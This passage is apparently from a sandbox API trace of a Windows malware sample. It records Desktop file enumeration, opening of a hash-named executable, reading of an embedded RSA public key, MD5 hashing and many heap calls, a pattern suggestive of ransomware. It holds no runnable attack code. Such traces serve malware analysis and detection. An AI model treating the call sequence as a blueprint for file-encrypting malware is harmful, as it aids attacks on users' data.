dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0187.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0187.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0187.541] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\") returned="Desktop\\" [0187.541] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0187.541] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0187.541] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0187.541] PathFindFileNameW (pszPath="") returned="" [0187.541] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x981b85c0, ftLastAccessTime.dwHighDateTime=0x1d8a8d3, ftLastWriteTime.dwLowDateTime=0x981b85c0, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0187.542] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x981b85c0, ftLastAccessTime.dwHighDateTime=0x1d8a8d3, ftLastWriteTime.dwLowDateTime=0x981b85c0, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0187.542] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77dd7e80, ftCreationTime.dwHighDateTime=0x1d8a8d3, ftLastAccessTime.dwLowDateTime=0x78761500, ftLastAccessTime.dwHighDateTime=0x1d8a8d3, ftLastWriteTime.dwLowDateTime=0x76528d00, ftLastWriteTime.dwHighDateTime=0x1d8a8b8, nFileSizeHigh=0x0, nFileSizeLow=0xb8800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe", cAlternateFileName="0336CC~1.EXE")) returned 1 [0187.542] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe") returned=".exe" [0187.542] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0187.543] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=755712) returned 1 [0187.543] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0187.547] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xb87da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.547] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0187.571] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.571] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x25805, lpOverlapped=0x0) returned 1 [0187.573] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0187.574] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.574] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.591] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0187.596] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0187.597] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0187.597] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0187.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0187.597] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0187.634] GetLastError () returned 0x0 [0187.652] SetLastError (dwErrCode=0x0) [0187.652] GetLastError () returned 0x0 [0187.652] SetLastError (dwErrCode=0x0) [0187.689] GetLastError () returned 0x0 [0187.689] SetLastError (dwErrCode=0x0) [0187.689] GetLastError () returned 0x0 [0187.689] SetLastError (dwErrCode=0x0) [0187.689] GetLastError () returned 0x0 [0187.689] SetLastError (dwErrCode=0x0) [0187.689] GetLastError () returned 0x0 [0187.689] SetLastError (dwErrCode=0x0) [0187.689] GetLastError () returned 0x0 [0187.689] SetLastError (dwErrCode=0x0) [0187.689] GetLastError () returned 0x0 [0187.689] SetLastError (dwErrCode=0x0) [0187.689] GetLastError () returned 0x0 [0187.689] SetLastError (dwErrCode=0x0) [0187.689] GetLastError () returned 0x0 [0187.689] SetLastError (dwErrCode=0x0) [0187.690] GetLastError () returned 0x0 [0187.690] SetLastError (dwErrCode=0x0) [0187.690] GetLastError () returned 0x0 [0187.690] SetLastError (dwErrCode=0x0) [0187.690] GetLastError () returned 0x0 [0187.690] SetLastError (dwErrCode=0x0) [0187.690] GetLastError () returned 0x0 [0187.691] SetLastError (dwErrCode=0x0) [0187.691] GetLastError () returned 0x0 [0187.691] SetLastError (dwErrCode=0x0) [0187.691] GetLastError () returned 0x0 [0187.691] SetLastError (dwErrCode=0x0) [0187.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0187.691] GetLastError () returned 0x0 [0187.691] SetLastError (dwErrCode=0x0) [0187.691] GetLastError () returned 0x0 [0187.691] SetLastError (dwErrCode=0x0) [0187.691] GetLastError () returned 0x0 [0187.691] SetLastError (dwErrCode=0x0) [0187.691] GetLastError () returned 0x0 [0187.691] SetLastError (dwErrCode=0x0) [0187.692] GetLastError () returned 0x0 [0187.692] SetLastError (dwErrCode=0x0) [0187.692] GetLastError () returned 0x0 [0187.692] SetLastError (dwErrCode=0x0) [0187.692] GetLastError () returned 0x0 [0187.692] SetLastError (dwErrCode=0x0) [0187.692] GetLastError () returned 0x0 [0187.692] SetLastError (dwErrCode=0x0) [0187.692] GetLastError () returned 0x0 [0187.692] SetLastError (dwErrCode=0x0) [0187.692] GetLastError () returned 0x0 [0187.692] SetLastError (dwErrCode=0x0) [0187.692] GetLastError () returned 0x0 [0187.692] SetLastError (dwErrCode=0x0) [0187.692] GetLastError () returned 0x0 [0187.692] SetLastError (dwErrCode=0x0) [0187.692] GetLastError () returned 0x0 [0187.692] SetLastError (dwErrCode=0x0) [0187.692] GetLastError () returned 0x0 [0187.692] SetLastError (dwErrCode=0x0) [0187.692] GetLastError () returned 0x0 [0187.692] SetLastError (dwErrCode=0x0) [0187.692] GetLastError () returned 0x0 [0187.693] SetLastError (dwErrCode=0x0) [0187.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0187.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0187.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0187.693] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0187.693] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0187.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0187.694] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0187.694] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0187.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0187.694] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0187.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0187.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0187.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25810) returned 0x2af5168 [0187.699] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0187.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0187.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0187.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0187.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0187.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0187.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d700 [0187.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05af8 [0187.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d7d8 [0187.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d7c0 [0187.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d7f0 [0187.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d808 [0187.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0187.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2f5b18 [0187.744] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2f5b18, Size=0x218) returned 0x2b1a980 [0187.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2b1aba0 [0187.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d7c0 | out: hHeap=0x2c0000) returned 1 [0187.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d808 | out: hHeap=0x2c0000) returned 1 [0187.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d7f0 | out: hHeap=0x2c0000) returned 1 [0187.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0187.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2b1aba0 | out: hHeap=0x2c0000) returned 1 [0187.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d7f0 [0187.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0187.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d808 [0187.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0187.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0d7c0 [0187.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0187.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0187.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0187.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0187.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0187.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0187.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0187.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0187.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0187.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d808 | out: hHeap=0x2c0000) returned 1 [0187.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0187.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d7c0 | out: hHeap=0x2c0000) returned 1 [0187.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0187.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0187.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d7f0 | out: hHeap=0x2c0000) returned 1 [0187.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0187.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0187.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2b1a980 | out: hHeap=0x2c0000) returned 1 [0187.879] GetCurrentThreadId () returned 0x5d8 [0187.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0187.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2edd50 [0187.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0187.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0187.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0187.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0187.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0187.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0187.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.880] GetCurrentThreadId () returned 0x5d8 [0187.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0187.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0187.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0187.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0187.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0187.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0187.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0187.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0187.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d7f0 [0187.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0187.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0187.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0187.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0187.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0187.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0187.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0187.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0187.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d7c0 [0187.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0187.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0187.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0187.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0187.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0187.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0187.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0187.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d808 [0187.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0187.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0187.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0187.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d7a8 [0187.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0187.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d820 [0187.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0187.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0187.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0187.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d898 [0187.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0187.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d778 [0187.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0187.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d838 [0187.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d778 | out: hHeap=0x2c0000) returned 1 [0187.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d778 [0187.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d898 | out: hHeap=0x2c0000) returned 1 [0187.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0187.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0187.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0187.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0187.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0187.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d7c0 | out: hHeap=0x2c0000) returned 1 [0187.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d7c0 [0187.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0187.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2b1a980 [0187.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d7f0 | out: hHeap=0x2c0000) returned 1 [0187.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0187.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d838 | out: hHeap=0x2c0000) returned 1 [0187.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2b1ab90 [0187.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0187.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0187.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0187.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0187.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d7c0 | out: hHeap=0x2c0000) returned 1 [0187.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2b1ada8 